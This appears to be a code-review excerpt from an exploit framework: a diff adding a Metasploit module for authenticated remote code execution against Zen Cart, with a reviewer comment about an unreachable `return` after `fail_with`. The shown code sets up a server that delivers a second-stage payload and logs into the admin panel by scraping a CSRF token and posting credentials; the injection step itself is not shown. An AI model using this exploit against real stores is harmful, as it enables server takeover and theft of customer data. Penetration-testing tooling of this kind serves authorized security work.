modules/exploits/linux/http/zencart_authenticated_rce.rb

```diff
@@ -0,0 +1,205 @@
+        OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
+        OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
+        OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
+      ], self.class
+    )
+  end
+
+  def start_server
+    ssltut = false
+    if datastore['SSL']
+      ssltut = true
+      datastore['SSL'] = false
+    end
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+                    on_request_uri(cli, req)
+                  end,
+        'Path' => resource_uri
+      }
+    })
+    print_status("payload is on #{get_uri}")
+    @adresim = get_uri
+    datastore['SSL'] = true if ssltut
+  end
+
+  def on_request_uri(cli, _request)
+    print_good('First stage is executed ! Sending 2nd stage of the payload')
+    send_response(cli, payload.encoded, { 'Content-Type' => 'text/html' })
+  end
+
+  def tabanyol
+    datastore['BASEPATH']
+  end
+
+  def isim
+    datastore['USERNAME']
+  end
+
+  def parola
+    datastore['PASSWORD']
+  end
+
+  def login
+    # "index.php?cmd=login&camefrom=index.php"
+    res = send_request_cgi('method' => 'GET',
+                           'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php'),
+                           'vars_get' => {
+                             'cmd' => 'login',
+                             'camefrom' => 'index.php'
+                           })
+    # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
+    unless res
+      fail_with(Failure::Unreachable, 'Access web application failure')
+    end
+    if res.code != 200
+      fail_with(Failure::Unreachable, 'we not have 200 response')
+    end
+
+    if !res.get_cookies.empty?
+      @cookie = res.get_cookies
+      @csrftoken = res.body.scan(%r{<input type="hidden" name="securityToken" value="(.*)" />}).flatten[0] || ''
+      if @csrftoken.empty?
+        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+      end
+    end
+
+    res = send_request_cgi('method' => 'POST',
+                           'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php?cmd=login&camefrom=index.php'),
+                           'cookie' => @cookie,
+                           'vars_post' => {
+                             'securityToken' => @csrftoken,
+                             'action' => 'do' + @csrftoken,
+                             'admin_name' => isim,
+                             'admin_pass' => parola
+                           })
+    if res.code != 302
+      fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+    end
+    true
+  end
+
+  def check
+    unless login
+      fail_with(Failure::UnexpectedReply, 'Wrong credentials')
+      return CheckCode::NotVulnerable('Wrong credentials')
```

Comment:
`fail_with` returns so the `return` line is never executed. `return` instead.

```suggestion
      return CheckCode::NotVulnerable('Wrong credentials')
```